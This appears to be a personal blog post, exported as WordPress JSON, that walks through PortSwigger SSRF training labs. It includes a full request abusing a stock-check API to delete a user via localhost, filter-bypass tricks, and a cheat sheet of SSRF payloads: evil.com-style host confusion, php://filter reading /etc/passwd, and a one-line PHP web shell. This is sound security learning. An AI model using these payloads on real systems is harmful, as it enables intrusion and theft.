{"id":345,"date":"2020-01-29T14:58:32","date_gmt":"2020-01-29T14:58:32","guid":{"rendered":"https:\/\/www.unordnung.net\/?p=345"},"modified":"2020-01-29T14:58:32","modified_gmt":"2020-01-29T14:58:32","slug":"basic-ssrf-portswigger-labs","status":"publish","type":"post","link":"https:\/\/unordnung.net\/misc\/2020\/01\/basic-ssrf-portswigger-labs\/","title":{"rendered":"Learning SSRF with Portswigger Labs"},"content":{"rendered":"\n<h3 class=\"wp-block-heading\">Basic SSRF against the local Server<\/h3>\n\n\n<p><a href=\"https:\/\/portswigger.net\/web-security\/ssrf\/lab-basic-ssrf-against-localhost\">https:\/\/portswigger.net\/web-security\/ssrf\/lab-basic-ssrf-against-localhost<\/a><\/p>\n\n\n<p>When accessing a product page an check stock link checks the stock through an API on some URL. We just need to change the url to localhost\/admin where we can see user delete links and here we go with the request to delete that carlos:<\/p>\n\n\n<pre class=\"wp-block-preformatted\">POST \/product\/stock HTTP\/1.1<br \/> Host: ace01fca1f144b2e80096a4b00aa0058.web-security-academy.net<br \/> User-Agent: Mozilla\/5.0 (X11; Linux x86_64; rv:68.0) Gecko\/20100101 Firefox\/68.0<br \/> Accept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,<em>\/<\/em>;q=0.8<br \/> Accept-Language: en-US,en;q=0.5<br \/> Accept-Encoding: gzip, deflate<br \/> Referer: https:\/\/ace01fca1f144b2e80096a4b00aa0058.web-security-academy.net\/product?productId=1<br \/> Content-Type: application\/x-www-form-urlencoded<br \/> Content-Length: 60<br \/> DNT: 1<br \/> Connection: close<br \/> Cookie: session=OQzPe2VCgJ9eEyxVAAO1RsYQYBBqDXj9<br \/> Upgrade-Insecure-Requests: 1<br \/><br \/> stockApi=http%3A%2F%2Flocalhost\/admin\/delete?username=carlos<\/pre>\n\n\n<h3 class=\"wp-block-heading\">Basic SSRRF against another backend system<\/h3>\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"http:\/\/unordnung.net\/misc\/wp-content\/uploads\/2020\/01\/burp_ssrf1-1024x736.png\" alt=\"\" class=\"wp-image-349\"\/><figcaption>Intruder setup to &#8220;scan&#8221; the subnet, payload is numbers from 0-255<\/figcaption><\/figure>\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"http:\/\/unordnung.net\/misc\/wp-content\/uploads\/2020\/01\/burp_ssrf2.png\" alt=\"\" class=\"wp-image-350\"\/><figcaption>We found one host with HTTP status 200, that must be it<\/figcaption><\/figure>\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"http:\/\/unordnung.net\/misc\/wp-content\/uploads\/2020\/01\/burp_ssrf3-1024x694.png\" alt=\"\" class=\"wp-image-351\"\/><figcaption>and we got it. ez af \ud83d\ude42<\/figcaption><\/figure>\n\n\n<h3 class=\"wp-block-heading\">SSRF with blacklist-based input filter<\/h3>\n\n\n<p>Aha. This one is harder, i&#8217;m looking for bypass methodologies and trying a lot of stuff like: <\/p>\n\n\n<ul class=\"wp-block-list\"><li>Encoding the URL with hex, URL, Octal,  base64<\/li><li>Trying limiters: url.domain;other.domain @ $ etc.<\/li><li>data:\/\/ file:\/\/ gopher:\/\/ datatypes<\/li><\/ul>\n\n\n<p>All got me HTTP 400<\/p>\n\n\n<pre class=\"wp-block-preformatted\">\"External stock check blocked for security reasons\"<br \/>\"Invalid external stock check url 'Invalid URL'\" <br \/>{\"error\":\"Path must start with \/\"}<\/pre>\n\n\n<p>Ok i tried to use a domain registered to localhost, this way i could get to  127.0.0.1, but with directory and parameters the filter got me again.<\/p>\n\n<p><!-- \/wp:post-content --><\/p>\n<p><!-- wp:image {\"id\":363,\"sizeSlug\":\"large\"} --><\/p>\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" class=\"wp-image-363\" src=\"http:\/\/unordnung.net\/misc\/wp-content\/uploads\/2020\/01\/burp_ssrf4-1024x464.png\" alt=\"\" \/><\/figure>\n<p><!-- \/wp:image --><\/p>\n<p><!-- wp:paragraph --><\/p>\n<p>Hah. Ive got it&#8230;a little char case changing and it worked finally -.-&#8216;<\/p>\n<p><!-- \/wp:paragraph --><\/p>\n<p><!-- wp:image {\"id\":368,\"sizeSlug\":\"large\"} --><\/p>\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" class=\"wp-image-368\" src=\"http:\/\/unordnung.net\/misc\/wp-content\/uploads\/2020\/01\/burp_ssrf5-1-1024x466.png\" alt=\"\" \/>\n<figcaption>finally<\/figcaption>\n<\/figure>\n<p><!-- \/wp:image --><br \/><!-- wp:paragraph --><\/p>\n<p>I should AGAIN rtfm more&#8230;would have been easy if i&#8217;d read the challenge description xD<\/p>\n<p><!-- wp:heading {\"level\":3} --><\/p>\n<h3>Ressources<\/h3>\n<p><!-- \/wp:heading --><\/p>\n<p><!-- wp:list --><\/p>\n<ul>\n<li><a href=\"https:\/\/docs.google.com\/document\/d\/1v1TkWZtrhzRLy0bYXBcdLUedXGb9njTNIJXa3u9akHM\/edit#heading=h.kwcnj7jh5zyy\">https:\/\/docs.google.com\/document\/d\/1v1TkWZtrhzRLy0bYXBcdLUedXGb9njTNIJXa3u9akHM\/edit#heading=h.kwcnj7jh5zyy<\/a><\/li>\n<li><a href=\"https:\/\/medium.com\/secjuice\/php-ssrf-techniques-9d422cb28d51\">https:\/\/medium.com\/secjuice\/php-ssrf-techniques-9d422cb28d51<\/a><\/li>\n<\/ul>\n<p><!-- \/wp:list --><\/p>\n<p><!-- wp:heading {\"level\":3} --><\/p>\n<h3>Cheat Sheet<\/h3>\n<p><!-- \/wp:heading --><\/p>\n<p><!-- wp:paragraph --><\/p>\n<p>dict:\/\/<br \/>sftp:\/\/<br \/>ldap:\/\/ or ldaps:\/\/ or ldapi:\/\/ <br \/>tftp:\/\/<br \/>gopher:\/\/<br \/>file:\/\/ \u2014 Accessing local filesystem <br \/>http:\/\/ \u2014 Accessing HTTP(s) URLs <br \/>ftp:\/\/ \u2014 Accessing FTP(s) URLs <br \/>php:\/\/ \u2014 Accessing various I\/O streams <br \/>zlib:\/\/ \u2014 Compression Streams<br \/>zip:\/\/<br \/>data:\/\/ \u2014 Data (RFC 2397) <br \/>glob:\/\/ \u2014 Find pathnames matching pattern <br \/>phar:\/\/ \u2014 PHP Archive <br \/>ssh2:\/\/ \u2014 Secure Shell 2 <br \/>rar:\/\/ \u2014 RAR<\/p>\n<p>expect:\/\/ \u2014 Process Interaction Streams<\/p>\n<p><!-- \/wp:paragraph --><\/p>\n<p><!-- wp:paragraph --><\/p>\n<p>;\u201d, \u201c\/\u201d, \u201c?\u201d, \u201c:\u201d, \u201c@\u201d, \u201c=\u201d and \u201c&amp;\u201d DELIMITERS in uri schemes<br \/>#<\/p>\n<pre>URI = scheme:[\/\/authority]path[?query][#fragment]<br \/>where the authority component divides into three <i>subcomponents<\/i>\nauthority = [userinfo@]host[:port]\n<\/pre>\n<p><!-- wp:paragraph --><\/p>\n<p>http:\/\/url.domain@evil.domain<br \/>data:\/\/google.com\/plain;base64,SSBsb3ZlIFBIUAo=<br \/>data:\/\/text\/plain;base64,SSBsb3ZlIFBIUAo=google.com<br \/>0:\/\/evil$google.com<br \/>0:\/\/evil.com:80,google.com:80\/<br \/>0:\/\/evil.com:80;google.com:80\/<\/p>\n<p>php:\/\/filter\/convert.base64-encode\/resource=\/etc\/passwd<br \/>php:\/\/input&amp;cmd=ls POST data:<\/p>\n<pre class=\"lang-php prettyprint prettyprinted\"><code> <span class=\"pun\">&lt;?<\/span><span class=\"pln\">php shell_exec<\/span><span class=\"pun\">(<\/span><span class=\"str\">$_GET['cmd']<\/span><span class=\"pun\">); <\/span><span class=\"pun\">?&gt;<\/span><\/code><\/pre>\n<p><!-- \/wp:paragraph --><\/p>\n<p><!-- wp:paragraph --><\/p>\n<p>data:\/\/text\/plain;base64,MTI3LjAuMC4xL2FkbWluLw===stock.weliketoshop.net<\/p>\n<p>zip:\/\/path\/to\/file.zip%23shell<\/p>\n<p><!-- \/wp:paragraph --><\/p>\n<p><!-- wp:paragraph --><\/p>\n<p>DNS OWN DOMAIN TO 127.0.0.1!!!<br \/>different 127.1<\/p>\n<p><!-- \/wp:paragraph --><\/p>\n<p><!-- wp:paragraph --><\/p>\n<p>upper lower case chars!!<\/p>\n<p><!-- \/wp:paragraph --><\/p>\n<p><!-- wp:paragraph --><\/p>\n<p>xip.io<br \/>nip.io<\/p>\n<p><!-- \/wp:paragraph --><\/p>\n<p><!-- wp:paragraph --><\/p>\n<h3>Ressources<\/h3>\n<ul>\n<li><a href=\"https:\/\/docs.google.com\/document\/d\/1v1TkWZtrhzRLy0bYXBcdLUedXGb9njTNIJXa3u9akHM\/edit#heading=h.kwcnj7jh5zyy\">https:\/\/docs.google.com\/document\/d\/1v1TkWZtrhzRLy0bYXBcdLUedXGb9njTNIJXa3u9akHM\/edit#heading=h.kwcnj7jh5zyy<\/a><\/li>\n<li><a href=\"https:\/\/medium.com\/secjuice\/php-ssrf-techniques-9d422cb28d51\">https:\/\/medium.com\/secjuice\/php-ssrf-techniques-9d422cb28d51<\/a><\/li>\n<li><a href=\"https:\/\/media.defcon.org\/DEF%20CON%2027\/DEF%20CON%2027%20presentations\/DEFCON-27-Ben-Sadeghipour-Owning-the-clout-through-SSRF-and-PDF-generators.pdf\" target=\"_blank\" rel=\"noopener noreferrer\">https:\/\/media.defcon.org\/DEF%20CON%2027\/DEF%20CON%2027%20presentations\/DEFCON-27-Ben-Sadeghipour-Owning-the-clout-through-SSRF-and-PDF-generators.pdf<\/a><\/li>\n<li><a href=\"https:\/\/github.com\/cujanovic\/SSRF-Testing\">https:\/\/github.com\/cujanovic\/SSRF-Testing<\/a><\/li>\n<li><a href=\"https:\/\/medium.com\/@Aptive\/local-file-inclusion-lfi-web-application-penetration-testing-cc9dc8dd3601\">https:\/\/medium.com\/@Aptive\/local-file-inclusion-lfi-web-application-penetration-testing-cc9dc8dd3601<\/a><\/li>\n<li><a href=\"http:\/\/webcache.googleusercontent.com\/search?q=cache:http:\/\/blog.safebuff.com\/2016\/07\/03\/SSRF-Tips\/\">http:\/\/webcache.googleusercontent.com\/search?q=cache:http:\/\/blog.safebuff.com\/2016\/07\/03\/SSRF-Tips\/<\/a><\/li>\n<\/ul>\n<p><!-- \/wp:paragraph --><\/p><!-- \/wp:paragraph -->","protected":false},"excerpt":{"rendered":"<p>Basic SSRF against the local Server https:\/\/portswigger.net\/web-security\/ssrf\/lab-basic-ssrf-against-localhost When accessing a product page an check stock link checks the stock through an API on some URL. We just need to change the url to localhost\/admin where we can see user delete links and here we go with the request to delete that carlos: POST \/product\/stock HTTP\/1.1 &#8230; <a title=\"Learning SSRF with Portswigger Labs\" class=\"read-more\" href=\"https:\/\/unordnung.net\/misc\/2020\/01\/basic-ssrf-portswigger-labs\/\">Read more<span class=\"screen-reader-text\">Learning SSRF with Portswigger Labs<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":393,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[29,37,43,68],"class_list":["post-345","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-to_remember","tag-hacking","tag-infosec","tag-learning","tag-ssrf"],"_links":{"self":[{"href":"https:\/\/unordnung.net\/misc\/wp-json\/wp\/v2\/posts\/345","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/unordnung.net\/misc\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/unordnung.net\/misc\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/unordnung.net\/misc\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/unordnung.net\/misc\/wp-json\/wp\/v2\/comments?post=345"}],"version-history":[{"count":0,"href":"https:\/\/unordnung.net\/misc\/wp-json\/wp\/v2\/posts\/345\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/unordnung.net\/misc\/wp-json\/"}],"wp:attachment":[{"href":"https:\/\/unordnung.net\/misc\/wp-json\/wp\/v2\/media?parent=345"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/unordnung.net\/misc\/wp-json\/wp\/v2\/categories?post=345"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/unordnung.net\/misc\/wp-json\/wp\/v2\/tags?post=345"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}